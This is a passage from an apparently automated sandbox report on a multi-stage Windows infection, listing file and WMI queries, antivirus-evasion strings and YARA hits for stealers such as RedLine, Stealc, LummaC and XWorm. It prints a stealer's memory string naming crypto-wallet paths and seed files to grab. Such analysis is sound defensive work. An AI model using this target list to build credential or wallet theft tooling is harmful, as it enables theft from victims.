Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Dynamic\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Dynamic.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel\v4.0_4.0.0.0__b77a5c561934e089\System.ServiceModel.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IdentityModel\v4.0_4.0.0.0__b77a5c561934e089\System.IdentityModel.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\SMDiagnostics\v4.0_4.0.0.0__b77a5c561934e089\SMDiagnostics.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel.Internals\v4.0_4.0.0.0__31bf3856ad364e35\System.ServiceModel.Internals.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1000322001\newbundle2.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1000322001\newbundle2.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1000322001\newbundle2.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1000322001\newbundle2.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1000322001\newbundle2.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1000322001\newbundle2.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1000322001\newbundle2.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Dynamic\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Dynamic.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1000322001\newbundle2.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel\v4.0_4.0.0.0__b77a5c561934e089\System.ServiceModel.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1000322001\newbundle2.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IdentityModel\v4.0_4.0.0.0__b77a5c561934e089\System.IdentityModel.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1000322001\newbundle2.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\SMDiagnostics\v4.0_4.0.0.0__b77a5c561934e089\SMDiagnostics.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1000322001\newbundle2.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel.Internals\v4.0_4.0.0.0__31bf3856ad364e35\System.ServiceModel.Internals.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1000322001\newbundle2.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1000322001\newbundle2.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1000322001\newbundle2.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1000322001\newbundle2.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1000342001\rstxdhuj.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1000342001\rstxdhuj.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1000342001\rstxdhuj.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1000349001\cccc2.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1000349001\cccc2.exe VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Queries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1000354001\c6f71c9f40.exe Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Code function: 6_2_0021CB1A GetSystemTimePreciseAsFileTime,GetSystemTimePreciseAsFileTime, 6_2_0021CB1A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid Jump to behavior
AV process strings found (often used to terminate AV products)
Source: gold.exe, 00000008.00000002.2764168671.00000000011F6000.00000004.00000020.00020000.00000000.sdmp, crypted.exe, 0000001C.00000002.2991813058.0000000000B65000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: avp.exe
Source: axplong.exe, 00000006.00000002.3518419435.0000000000F15000.00000004.00000020.00020000.00000000.sdmp, axplong.exe, 00000006.00000003.3252257395.0000000000F15000.00000004.00000020.00020000.00000000.sdmp, axplong.exe, 00000006.00000002.3518419435.0000000000EBB000.00000004.00000020.00020000.00000000.sdmp, axplong.exe, 00000006.00000003.3252600342.0000000000F26000.00000004.00000020.00020000.00000000.sdmp, gold.exe, 00000008.00000002.2764168671.00000000011F6000.00000004.00000020.00020000.00000000.sdmp, crypted.exe, 0000001C.00000002.2991813058.0000000000B65000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: AVP.exe
Source: RegAsm.exe, 0000001F.00000002.3421831701.000000000779E000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000001F.00000002.3303759559.0000000005EC4000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Source: C:\Users\user\AppData\Roaming\VCIo8iTrPf.exe WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM AntivirusProduct
Source: C:\Users\user\AppData\Roaming\VCIo8iTrPf.exe WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM AntiSpyWareProduct
Source: C:\Users\user\AppData\Roaming\VCIo8iTrPf.exe WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM FirewallProduct
Source: C:\Users\user\AppData\Roaming\VCIo8iTrPf.exe WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntivirusProduct
Source: C:\Users\user\AppData\Roaming\VCIo8iTrPf.exe WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiSpyWareProduct
Source: C:\Users\user\AppData\Roaming\VCIo8iTrPf.exe WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM FirewallProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM AntivirusProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM AntiSpyWareProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM FirewallProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntivirusProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiSpyWareProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM FirewallProduct
Source: C:\Users\user\AppData\Local\Temp\1000322001\newbundle2.exe WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM AntivirusProduct
Source: C:\Users\user\AppData\Local\Temp\1000322001\newbundle2.exe WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM AntiSpyWareProduct
Source: C:\Users\user\AppData\Local\Temp\1000322001\newbundle2.exe WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM FirewallProduct
Source: C:\Users\user\AppData\Local\Temp\1000322001\newbundle2.exe WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntivirusProduct
Source: C:\Users\user\AppData\Local\Temp\1000322001\newbundle2.exe WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiSpyWareProduct
Source: C:\Users\user\AppData\Local\Temp\1000322001\newbundle2.exe WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM FirewallProduct

Stealing of Sensitive Information
barindex
Yara detected Amadeys stealer DLL
Source: Yara match File source: 18.0.Nework.exe.930000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 19.0.Hkbsse.exe.5a0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 19.2.Hkbsse.exe.5a0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 20.2.Hkbsse.exe.5a0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 18.2.Nework.exe.930000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.2.axplong.exe.200000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 2.2.axplong.exe.200000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 6.2.axplong.exe.200000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 20.0.Hkbsse.exe.5a0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.file.exe.b50000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000013.00000002.2831867079.00000000005A1000.00000020.00000001.01000000.00000011.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.2262892966.0000000000201000.00000040.00000001.01000000.00000007.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000003.2725148895.0000000004A00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000003.2222614082.0000000004A20000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000014.00000000.2831681821.00000000005A1000.00000020.00000001.01000000.00000011.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.2187029054.0000000005370000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000013.00000000.2830209557.00000000005A1000.00000020.00000001.01000000.00000011.sdmp, type: MEMORY
Source: Yara match File source: 00000014.00000002.2833629275.00000000005A1000.00000020.00000001.01000000.00000011.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.2276396651.0000000000201000.00000040.00000001.01000000.00000007.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.2227686049.0000000000B51000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match File source: 00000012.00000000.2818707390.0000000000931000.00000020.00000001.01000000.00000010.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000002.3514768739.0000000000201000.00000040.00000001.01000000.00000007.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.2235626454.0000000004C10000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000012.00000002.2832307218.0000000000931000.00000020.00000001.01000000.00000010.sdmp, type: MEMORY
Source: Yara match File source: C:\Users\user\AppData\Local\Temp\054fdc5f70\Hkbsse.exe, type: DROPPED
Source: Yara match File source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6ATIQPJI\Nework[1].exe, type: DROPPED
Source: Yara match File source: C:\Users\user\AppData\Local\Temp\1000005001\Nework.exe, type: DROPPED
Yara detected CryptOne packer
Source: Yara match File source: 00000018.00000002.3021996080.0000000003129000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Yara detected LummaC Stealer
Source: Yara match File source: decrypted.memstr, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: stealc_default2.exe PID: 3488, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: svchost015.exe PID: 5268, type: MEMORYSTR
Yara detected PureLog Stealer
Source: Yara match File source: 25.0.penis.exe.ac0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000019.00000000.2952756193.0000000000AC2000.00000002.00000001.01000000.00000014.sdmp, type: MEMORY
Source: Yara match File source: C:\Users\user\AppData\Local\Temp\1000254001\penis.exe, type: DROPPED
Source: Yara match File source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BLNS00AZ\penis[1].exe, type: DROPPED
Yara detected RedLine Stealer
Source: Yara match File source: dump.pcap, type: PCAP
Source: Yara match File source: 31.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 34.0.newbundle2.exe.30000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 28.2.crypted.exe.38a5570.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.RegAsm.exe.436080.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.RegAsm.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 8.2.gold.exe.4165570.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.RegAsm.exe.436080.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.0.VCIo8iTrPf.exe.ff0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 8.2.gold.exe.4165570.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.RegAsm.exe.400000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000011.00000000.2808170295.0000000000FF2000.00000002.00000001.01000000.0000000F.sdmp, type: MEMORY
Source: Yara match File source: 00000022.00000000.3039915900.0000000000051000.00000002.00000001.01000000.0000001D.sdmp, type: MEMORY
Source: Yara match File source: 0000001C.00000002.3027013594.00000000038C5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.2809221317.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000002.3514615123.0000000000421000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001F.00000002.3187193053.0000000000423000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.2764953143.0000000004165000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: gold.exe PID: 4892, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: RegAsm.exe PID: 2720, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: RegAsm.exe PID: 6696, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: VCIo8iTrPf.exe PID: 5984, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: penis.exe PID: 6200, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: crypted.exe PID: 3792, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: RegAsm.exe PID: 4816, type: MEMORYSTR
Source: Yara match File source: C:\Users\user\AppData\Roaming\VCIo8iTrPf.exe, type: DROPPED
Source: Yara match File source: C:\Users\user\AppData\Local\Temp\1000322001\newbundle2.exe, type: DROPPED
Source: Yara match File source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BLNS00AZ\newbundle2[1].exe, type: DROPPED
Yara detected Stealc
Source: Yara match File source: 24.2.needmoney.exe.3710000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 24.2.needmoney.exe.3740000.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 23.2.stealc_default2.exe.930000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 24.2.needmoney.exe.3710000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 24.2.needmoney.exe.3740000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 24.2.needmoney.exe.30fa4b9.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 24.2.needmoney.exe.30fa4b9.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 23.0.stealc_default2.exe.930000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000029.00000003.3171679360.0000000005390000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000017.00000002.3070584798.000000000101E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000018.00000002.3031467583.0000000003740000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000017.00000000.2849048856.0000000000931000.00000080.00000001.01000000.00000012.sdmp, type: MEMORY
Source: Yara match File source: 0000001E.00000002.3376541999.0000000000BFE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000017.00000002.3065909202.0000000000931000.00000080.00000001.01000000.00000012.sdmp, type: MEMORY
Source: Yara match File source: 00000018.00000002.3030940765.0000000003710000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000018.00000002.3021996080.0000000002E20000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: stealc_default2.exe PID: 3488, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: svchost015.exe PID: 5268, type: MEMORYSTR
Source: Yara match File source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe, type: DROPPED
Source: Yara match File source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\RCIIZOAM\stealc_default2[1].exe, type: DROPPED
Source: Yara match File source: dump.pcap, type: PCAP
Yara detected Vidar stealer
Source: Yara match File source: Process Memory Space: stealc_default2.exe PID: 3488, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: svchost015.exe PID: 5268, type: MEMORYSTR
Yara detected XWorm
Source: Yara match File source: 38.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 35.2.rstxdhuj.exe.38efdb0.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 35.2.rstxdhuj.exe.38a1590.4.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000023.00000002.3231251960.00000000038A1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000023.00000002.3116851630.0000000002971000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000026.00000002.3514611255.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Yara detected zgRAT
Source: Yara match File source: 25.0.penis.exe.ac0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: C:\Users\user\AppData\Local\Temp\1000254001\penis.exe, type: DROPPED
Source: Yara match File source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BLNS00AZ\penis[1].exe, type: DROPPED
Found many strings related to Crypto-Wallets (likely being stolen)
Source: VCIo8iTrPf.exe, 00000011.00000002.3014501020.0000000003257000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: ElectrumE#
Source: stealc_default2.exe, 00000017.00000002.3070584798.0000000001081000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: \??\C:\Users\user\AppData\Roaming\ElectronCash\wallets\*.*O]
Source: stealc_default2.exe, 00000017.00000002.3070584798.0000000001010000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
Source: VCIo8iTrPf.exe, 00000011.00000002.3014501020.0000000003257000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: JaxxE#
Source: stealc_default2.exe, 00000017.00000002.3070584798.0000000001081000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: C:\Users\user\AppData\Roaming\\Exodus\\window-state.json
Source: stealc_default2.exe, 00000017.00000002.3070584798.0000000001010000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
Source: stealc_default2.exe, 00000017.00000002.3070584798.0000000001081000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: C:\Users\user\AppData\Roaming\\Exodus\\window-state.json
Source: stealc_default2.exe, 00000017.00000002.3070584798.0000000001010000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local 